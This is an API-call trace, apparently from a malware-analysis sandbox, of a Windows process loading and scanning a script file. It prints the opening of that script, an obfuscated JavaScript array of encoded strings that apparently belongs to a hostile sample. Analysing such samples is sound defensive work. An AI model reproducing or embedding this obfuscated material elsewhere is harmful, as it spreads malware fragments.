	[0104.577] DllGetClassObject (in: rclsid=0x27e400*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), riid=0x7fefebb6cd0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x15d480 | out: ppv=0x15d480*=0x42edd0) returned 0x0
	[0104.577] ??2@YAPEAX_K@Z () returned 0x42edd0
	[0104.577] IClassFactory:CreateInstance (in: This=0x42edd0, pUnkOuter=0x0, riid=0x15e260*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x15d4a0 | out: ppvObject=0x15d4a0*=0x42f1e0) returned 0x0
	[0104.577] ??2@YAPEAX_K@Z () returned 0x42f0d0
	[0104.577] GetSystemInfo (in: lpSystemInfo=0x15d2e0 | out: lpSystemInfo=0x15d2e0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0104.577] VirtualQuery (in: lpAddress=0x15d350, lpBuffer=0x15d310, dwLength=0x30 | out: lpBuffer=0x15d310*(BaseAddress=0x15d000, AllocationBase=0x60000, AllocationProtect=0x4, __alignment1=0xfffff880, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0104.577] ??2@YAPEAX_K@Z () returned 0x42f110
	[0104.577] ??2@YAPEAX_K@Z () returned 0x42f130
	[0104.577] ??2@YAPEAX_K@Z () returned 0x42f190
	[0104.577] ??2@YAPEAX_K@Z () returned 0x42f1c0
	[0104.577] ??2@YAPEAX_K@Z () returned 0x42f270
	[0104.578] IUnknown:AddRef (This=0x42f1e0) returned 0x2
	[0104.578] IUnknown:Release (This=0x42f1e0) returned 0x1
	[0104.578] IUnknown:Release (This=0x42edd0) returned 0x0
	[0104.578] ??3@YAXPEAX@Z () returned 0x57760f01
	[0104.578] IUnknown:QueryInterface (in: This=0x42f1e0, riid=0x7fee33af860*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x15e6e8 | out: ppvObject=0x15e6e8*=0x42f1e0) returned 0x0
	[0104.578] IUnknown:Release (This=0x42f1e0) returned 0x1
	[0104.578] _strnicmp (_Str1="<?xml", _Str="var d", _MaxCount=0x5) returned -58
	[0104.578] IsTextUnicode (in: lpv=0x42a210, iSize=19304, lpiResult=0x15e738 | out: lpiResult=0x15e738) returned 0
	[0104.578] GetACP () returned 0x4e4
	[0104.578] malloc (_Size=0x97d0) returned 0x43dfd0
	[0104.578] GetACP () returned 0x4e4
	[0104.578] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x42a210, cbMultiByte=19304, lpWideCharStr=0x43dfd0, cchWideChar=19432 | out: lpWideCharStr="var dogoswoisosfhsdiefgssqda=['wqtowqjClg==','w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg','MErCsEPDhcKacRHCmA==','wozDhsKiwrPDl8KxFAY=','woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O7eMKVwpxeYw==','wrDCpsOTwqBiwqfDjELCj27CoETDmHnDnxhqw5fClMKJGsOzwoPCqcOYQm1XW3sBCsOEPcKfZiU7EzrDuMODwp7Cp8OaKMOHw4wDVD5ZfMONfsO/w5c/wq5Ww7jChcOTwrNeIGbDs8KrPVvDqyEjOsKmKDxiwp5aw7jCtgTDuxxXacO3OHJsVk5XwozDvzrCpg==','wqprwqgaw4jCih0=','wofDo8KZwpvDq8KMYn/ConzDt8Kyw6xiQsOIE8OWwrFHPsO3w4PCiEHCk8K3wq7Cn1g=','wozDkcKcwozCmMO4Ew3CojHCnQ==','w7JGw6XCpS4=','w49sw43DuMKR','wrVrwr05w4o=','w4QQwpzCqMK9','wqrDu8OaCsOw','AHliEUE=','UxoSMTA=','UhQDDwg=','cwtkccKr','w79Mw6/DjsKfwqnCi8OTw5FhG8OgFnpkJA==','wowhFljClA==','csO8AMOuZA==','bhADAg==','woTCr8Owwr1N','TErDmMK6wos=','NAbDsMOpNw==','wq7DmsKJw4Z5','wqvCvEbCoks=','w5DDszthPQ==','wrDDgcKlZsKz','wqnDjsKVXcK9','wrrCs8KEDcOY','WcKzfsKnfA==','QTp1VsKB','wqrDicOVbsKL','enXCv8K7','w64uwqc2w4Y=','HnBCBg==','wqYCYQYf','XFbDmMKnwoDCi8Kew6/DpmjCrg==','wo1iUsO9Pw==','w7zDgcOjP8Kt','Rg11bsKR','w5pBwqUBwo8=','O2XCk8O/w6A=','woXCk8OZwrZq','wrvCu8Owwot+','wq5owo0pw64=','ZsOmG8OlTw==','e8OPwq4qMQ==','YhZ3d8Ki','w4BbwpvCt8OY','w7o+woQsw4s=','wojDosO+LcOW','ZH7DvC/DlQ==','c3dOwozChQ==','woVCZsOBPw==','TQxZW8Kn','PRTDssOyFw==','wpcDwpvDmsOo','RlTDuMKywqA=','NsKlecK7w7Q=','YMO/EsOldg==','w55Qw7nDosKj','w5DDmcOseDvDjsKhw4jChX0cVA3DkW/CqMKTw5QLXMOHcMKowrrCux1bwqoBRsKPw79aAGMbw6B4ZTLCrMKKBsKVwq7DglMRK8KRHjTCuMK8w514JxRiwr3DgcKX','wrXClsKBHMOa','wofDu8OVNsOZ','wqXCksOSwoU=','w61Jw6zCsCs=','XMOwOcOz','w6fCq8OoGWE=','LFYlKX0=','wobCgcKOw6ck','w7NpwpfCksOK','GUTCrcOhw7k=','HMOuwqLCn18=','w51Lw7zCoyo=','woZ5TMO8HA==','wqIMDH3Cr8KFQyNUwq8w','w5zDt2Mxwqc=','CMKwDcOTw4w=','I1NBHlA=','w4ljw6XCpzE=','wp8zwqLDkMOy','wqLCh8ONwph/','w7/DmMOLMA==','wqDDnMO6ZcKf','w4V4wp4RwoweF8OtH110dE4=','wp7DoMO6PsOVw5ZJFsOQbMKJCELCow==','DEvCrcOWw6hQwq4jKMOWHwrCqMK+w7J1wqPDhyk=','wpAMI0DCkw==','w7DDuH0rwr8=','OSrDhsOAOcKVQsKIXFXDpsOIwrYRwo0y','wpfCvMOQwotA','wqXCi1rCgm0=','d37CtMK6','F3JpGko=','wpfCnsKzOsO2','Gn9GHWs=','WlXDnsKKwok=','P8OnwrPDp8K6','XQxsS8KX','w4BBw5LDmsKj','LMOVwqvClsOq','wqHChUHCrmc=','dnfCl8KKw4s=','wrzDi8KEw75j','w5ELwpUqw5E=','HGLCv8O5w4M=','O8OCwpfCs0s=','w59uw6rDmMK/','NsOTwonCnms=','OcOrwqvCvV4=','VUHDj8KFwrE=','w6PDssO3KsKg','VcKqXMKseA==','KcOWwpHDq8KJ','wonDtcKkwqlF','wrjCt8KIw5gFIQ==','G8Orwr/DsAE=','w51iwpwgwpw=','wrrDi8KQw75X','U2hiwoPClA==','wovDjsKpwohCQw4=','PVV+A0E=','w75OwpMEwpEG','RQYPLiM=','TUPDoSjDng==','w6nDigxBCw==','wrTCnsK5LMOh','esKJZMKIfA==','wqgkNXTCng==','JMOKw7zCvw==','wrENRAc5','O8OUwpHDpsKa','eXfCuMK8','BznDhcORJw==','QmRawpbCosOIe8KsEXTCow==','UEdxwqTCpQ==','w4xdw4/CpSY=','H8OFwrTDisKc','SMOdwo8SPA==','d8KmRcKYew==','w7ELwoLCj8KIw4F4','G8OZwoTDiTw=','wq7DhcKYwrdc','wpvCgMK2M8OR','wpHDr8Krw5Fh','wqfDl8K7wrTDrg==','YcOhanFu','IcO7w6bChSI=','wqfDoMK0bMKm','wqrChcKCH8O0','w5Zww6DDrsKS','w4TDmMOjEMKg','PDDDhsOQOcKOWMKFCBDDiA==','wqrDnMKkwo7Dn8O0G0nCgW3Dg8ORwq9ISg==','w7TDh8OSMsKR','PSfDscOCHg==','wqXCsE7CsnM=','w5TDkSVzAQ==','PsONwrHDlCg=','MsOKwpzDlMKK','RWYWwpnDvg==','woMbB1bCqQ==','wqbCmsKQw6Ia','wo7DqMKtVMKt','czRabsKB','ADDCiTnDhcOhGn/Diix+woFBwptnaMKKTcOlwo3DgMOEwq1GwobDjMKxw5PDtcOtwoLDlsOgw57DuFUgwrVcwqcJMR7CnmbCnQbDnAhKw7QHwrhuM8Odw68AFcKbOsOB','w5DDt1cuwo8=','W0fDisKn','wobDhMKSwoh5','cVrCm8K+w6A=','w6HDksORKg==','wrfCpVHCjlM=','w7dEw7fCly8=','w6fDrTNQJg==','w6wne8Oiw50=','woJqwokjw50=','wqjClMKNw4gz','Fl3CgljCqw==','woddeMOeMsKJwoHCj8OaNno=','wo0rFljCjQ==','w5FWw6rChig=','wpHDqsK2w4Y=','wqHCs1rCuw==','w6NfwprCsMO1FA==','BsKiMcORw5M=','w4tHw5bCsgw=','w5YwRsOmw6HDicKQw7ZEXcOB','w6UMwp7CjcKZwoQiwo5zdHrDj8KBRsOf','wqEmXCgH','S8O6JMO0aMKow7A1bQLCrg==','w6QTZcO8w7o=','fcKneMK0SA==','woPDj8OdUcKH','w4Ffw6zDn8KB','f0fCl8KIw6E=','w6jCvMOqPXU=','wp3CjMKCw4cN','wrYOcRgw','wpx6wpQ+w5U=','w6nClMO6Ilc=','w7rDgMOvGMKM','wqfDtMKTU8Ky','wrjCkFXCgGfDpMODwprDh8OMwrnDs8KiSgsWwplte8K1woILw4rCs8KbRQ0CwqpeGR1qwrvDv2zCmQnDozBPOcKlU8KDdwZ5V8KzbsKhwrrDtMOQwrlGFsKmw7JSNmF5BsOTLsKMHF9kwoHCmsOzLx3Dg8KsbcKkFcKuNnvCjA==','w43DlsKCHMKLwqDChxo5TcKScsO6fWQ8w47DvcObwr9UT3fDhsOpW0vCvMOLw4Mrw6BAdMOfw4XCiULCsXXDlcOlRsKXLRA2woLDoMOvw47DkMO2w6YIw6DDqsO1w7/DmsKndWATwoU3w4ozwqdLYsOsJ0XCrw==','w51Tw57CqzXDuQ==','WsKDc8KJ','Bz7DhMKND8KfesK+HR7DuMKDw4Fj','w5lhw43Cvg7Dj8OMwoDDjmE7exhkLcKCGcOiwoYwdsKlwonDu8OAwqlWfyXDiWNDeBHDlX4YbMKuFHjCpsKTFMOTwqdCwqJQwpDDpyVmFMKyO8O0w5MQw5oxwqvDj1XDpG/DrcKtw6A5wqvCkUA=','C0PCtErCp8KoZRjCkRAMwpo+w7w8d8KpA8OUw6XCjMKxwrIMwqrCoA==','w7Nowr8AwrI2AsK1FndyT3rDgMOWw68CLcKLF2QawpVtdMOHKFdFCXgLw4fCosO7D3gncsK/ScOow74dw6jCp8KZTcKHw4PCrcKbwqbCp8Oew5M7wrDDhsOaDcO9','OcOlwq3CucO2w5hLw4N0CcO1w4A=','Vn7DjiDDu8Kjw4I9wrRPwr3CrAzCh0I=','w7XDjWwjwrzCoANpAMOlSCgQB8OPBA==','T0gswqrDrcObbRBLLsONwpHCrMOzw41vw6LDnR3CgEJxw4/DgMKbTcOOTMOVw4BEw5TDtcOPSw==','w4BfwrnCgcO7ImweNx7CiMObw6EdeCXDigHCnzU=','wp/Dl8KawrrDm8KzcQ==','bnwjwpPDm8KqD1F+','B8KyGsOh','K8O1wqnDsiTCnMKtwrYTfQ/CpcK8EUbCuBUuw5nCncOlw4PCsmEpwr7CgcKtEQ==','wq7CksKWw50u','wrPDh8O8WMKvEsOESMOFQMKgXXPDqsKEX8KlIsO2NELDu8KvA8Olw6cOL8K6wqDCukkVS8Oswr06Di/CocOmRsO6wptnwoNtAMKzw6lRw5ofPMOHNhJb") returned 19304
	[0104.579] realloc (_Block=0x43dfd0, _Size=0x96d0) returned 0x43dfd0
	[0104.579] ??2@YAPEAX_K@Z () returned 0x42edd0
	[0104.580] free (_Block=0x43dfd0) 
	[0104.580] ??3@YAXPEAX@Z () returned 0x57760f01
	[0104.580] ??3@YAXPEAX@Z () returned 0x57760f01
	[0104.580] ??3@YAXPEAX@Z () returned 0x57760f01
	[0104.580] ??3@YAXPEAX@Z () returned 0x57760f01
	[0104.580] ??3@YAXPEAX@Z () returned 0x57760f01
	[0104.580] ??3@YAXPEAX@Z () returned 0x57760f01
	[0104.580] CoUninitialize () 
	[0104.580] ??3@YAXPEAX@Z () returned 0x57760f01
	[0104.580] CloseHandle (hObject=0x140) returned 1
	[0104.580] wcsncmp (_String1="var dogoswoisosfhsdiefgssqda=['wq", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 105
	[0104.580] wcsncmp (_String1="ar dogoswoisosfhsdiefgssqda=['wqt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0104.580] wcsncmp (_String1="r dogoswoisosfhsdiefgssqda=['wqto", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0104.580] wcsncmp (_String1=" dogoswoisosfhsdiefgssqda=['wqtow", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 19
	[0104.580] wcsncmp (_String1="dogoswoisosfhsdiefgssqda=['wqtowq", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 87
	[0104.580] wcsncmp (_String1="ogoswoisosfhsdiefgssqda=['wqtowqj", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0104.580] wcsncmp (_String1="goswoisosfhsdiefgssqda=['wqtowqjC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0104.580] wcsncmp (_String1="oswoisosfhsdiefgssqda=['wqtowqjCl", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0104.580] wcsncmp (_String1="swoisosfhsdiefgssqda=['wqtowqjClg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0104.580] wcsncmp (_String1="woisosfhsdiefgssqda=['wqtowqjClg=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0104.580] wcsncmp (_String1="oisosfhsdiefgssqda=['wqtowqjClg==", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0104.580] wcsncmp (_String1="isosfhsdiefgssqda=['wqtowqjClg=='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 92
	[0104.580] wcsncmp (_String1="sosfhsdiefgssqda=['wqtowqjClg==',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0104.580] wcsncmp (_String1="osfhsdiefgssqda=['wqtowqjClg==','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0104.580] wcsncmp (_String1="sfhsdiefgssqda=['wqtowqjClg==','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0104.580] wcsncmp (_String1="fhsdiefgssqda=['wqtowqjClg==','w5", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89
	[0104.581] wcsncmp (_String1="hsdiefgssqda=['wqtowqjClg==','w5M", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91
	[0104.581] wcsncmp (_String1="sdiefgssqda=['wqtowqjClg==','w5Mc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0104.581] wcsncmp (_String1="diefgssqda=['wqtowqjClg==','w5Mcw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 87
	[0104.581] wcsncmp (_String1="iefgssqda=['wqtowqjClg==','w5Mcwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 92
	[0104.581] wcsncmp (_String1="efgssqda=['wqtowqjClg==','w5Mcwr/", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 88
	[0104.581] wcsncmp (_String1="fgssqda=['wqtowqjClg==','w5Mcwr/D", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89
	[0104.581] wcsncmp (_String1="gssqda=['wqtowqjClg==','w5Mcwr/Dv", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0104.581] wcsncmp (_String1="ssqda=['wqtowqjClg==','w5Mcwr/Dvc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0104.581] wcsncmp (_String1="sqda=['wqtowqjClg==','w5Mcwr/DvcO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0104.581] wcsncmp (_String1="qda=['wqtowqjClg==','w5Mcwr/DvcOs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100
	[0104.581] wcsncmp (_String1="da=['wqtowqjClg==','w5Mcwr/DvcOsK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 87
	[0104.581] wcsncmp (_String1="a=['wqtowqjClg==','w5Mcwr/DvcOsK2", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0104.581] wcsncmp (_String1="=['wqtowqjClg==','w5Mcwr/DvcOsK2c", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0104.581] wcsncmp (_String1="['wqtowqjClg==','w5Mcwr/DvcOsK2cu", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 78
	[0104.581] wcsncmp (_String1="'wqtowqjClg==','w5Mcwr/DvcOsK2cuB", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0104.581] wcsncmp (_String1="wqtowqjClg==','w5Mcwr/DvcOsK2cuBQ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0104.581] wcsncmp (_String1="qtowqjClg==','w5Mcwr/DvcOsK2cuBQ=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100
	[0104.581] wcsncmp (_String1="towqjClg==','w5Mcwr/DvcOsK2cuBQ==", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103
	[0104.581] wcsncmp (_String1="owqjClg==','w5Mcwr/DvcOsK2cuBQ=='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0104.581] wcsncmp (_String1="wqjClg==','w5Mcwr/DvcOsK2cuBQ==',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0104.581] wcsncmp (_String1="qjClg==','w5Mcwr/DvcOsK2cuBQ==','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100
	[0104.581] wcsncmp (_String1="jClg==','w5Mcwr/DvcOsK2cuBQ==','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93
	[0104.581] wcsncmp (_String1="Clg==','w5Mcwr/DvcOsK2cuBQ==','wr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0104.581] wcsncmp (_String1="lg==','w5Mcwr/DvcOsK2cuBQ==','wrv", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 95
	[0104.581] wcsncmp (_String1="g==','w5Mcwr/DvcOsK2cuBQ==','wrvD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0104.581] wcsncmp (_String1="==','w5Mcwr/DvcOsK2cuBQ==','wrvDp", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0104.581] wcsncmp (_String1="=','w5Mcwr/DvcOsK2cuBQ==','wrvDps", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0104.581] wcsncmp (_String1="','w5Mcwr/DvcOsK2cuBQ==','wrvDpsO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0104.581] wcsncmp (_String1=",'w5Mcwr/DvcOsK2cuBQ==','wrvDpsOq", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0104.581] wcsncmp (_String1="'w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0104.581] wcsncmp (_String1="w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0104.581] wcsncmp (_String1="5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8K", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 40
	[0104.581] wcsncmp (_String1="Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8KN", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0104.581] wcsncmp (_String1="cwr/DvcOsK2cuBQ==','wrvDpsOqD8KNw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0104.581] wcsncmp (_String1="wr/DvcOsK2cuBQ==','wrvDpsOqD8KNwp", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0104.581] wcsncmp (_String1="r/DvcOsK2cuBQ==','wrvDpsOqD8KNwpb", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0104.581] wcsncmp (_String1="/DvcOsK2cuBQ==','wrvDpsOqD8KNwpbC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 34
	[0104.581] wcsncmp (_String1="DvcOsK2cuBQ==','wrvDpsOqD8KNwpbCj", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0104.581] wcsncmp (_String1="vcOsK2cuBQ==','wrvDpsOqD8KNwpbCjh", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 105
	[0104.582] wcsncmp (_String1="cOsK2cuBQ==','wrvDpsOqD8KNwpbCjh8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0104.582] wcsncmp (_String1="OsK2cuBQ==','wrvDpsOqD8KNwpbCjh8p", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0104.582] wcsncmp (_String1="sK2cuBQ==','wrvDpsOqD8KNwpbCjh8pa", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0104.582] wcsncmp (_String1="K2cuBQ==','wrvDpsOqD8KNwpbCjh8pas", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0104.582] wcsncmp (_String1="2cuBQ==','wrvDpsOqD8KNwpbCjh8pasK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 37
	[0104.582] wcsncmp (_String1="cuBQ==','wrvDpsOqD8KNwpbCjh8pasKg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0104.582] wcsncmp (_String1="uBQ==','wrvDpsOqD8KNwpbCjh8pasKgV", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 104
	[0104.582] wcsncmp (_String1="BQ==','wrvDpsOqD8KNwpbCjh8pasKgV8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 53
	[0104.582] wcsncmp (_String1="Q==','wrvDpsOqD8KNwpbCjh8pasKgV8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 68
	[0104.582] wcsncmp (_String1="==','wrvDpsOqD8KNwpbCjh8pasKgV8Oz", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0104.582] wcsncmp (_String1="=','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0104.582] wcsncmp (_String1="','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0104.582] wcsncmp (_String1=",'wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1x", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0104.582] wcsncmp (_String1="'wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0104.582] wcsncmp (_String1="wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0104.582] wcsncmp (_String1="rvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0104.582] wcsncmp (_String1="vDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7j", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 105
	[0104.582] wcsncmp (_String1="DpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7jD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0104.582] wcsncmp (_String1="psOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 99
	[0104.582] wcsncmp (_String1="sOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0104.582] wcsncmp (_String1="OqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0104.582] wcsncmp (_String1="qD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8Ow", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100
	[0104.582] wcsncmp (_String1="D8KNwpbCjh8pasKgV8Ozb1xZw7jDu8Oww", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0104.582] wcsncmp (_String1="8KNwpbCjh8pasKgV8Ozb1xZw7jDu8Owwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0104.582] wcsncmp (_String1="KNwpbCjh8pasKgV8Ozb1xZw7jDu8Owwrt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0104.582] wcsncmp (_String1="NwpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtS", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 65
	[0104.582] wcsncmp (_String1="wpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSX", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0104.582] wcsncmp (_String1="pbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 99
	[0104.582] wcsncmp (_String1="bCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 85
	[0104.582] wcsncmp (_String1="Cjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0104.582] wcsncmp (_String1="jh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93
	[0104.582] wcsncmp (_String1="h8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgM", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91
	[0104.582] wcsncmp (_String1="8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0104.582] wcsncmp (_String1="pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 99
	[0104.582] wcsncmp (_String1="asKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0104.582] wcsncmp (_String1="sKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0104.582] wcsncmp (_String1="KgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0X", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0104.582] wcsncmp (_String1="gV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0104.582] wcsncmp (_String1="V8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 73
	[0104.583] wcsncmp (_String1="8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0104.583] wcsncmp (_String1="Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0104.583] wcsncmp (_String1="zb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OA", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 109
	[0104.583] wcsncmp (_String1="b1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 85
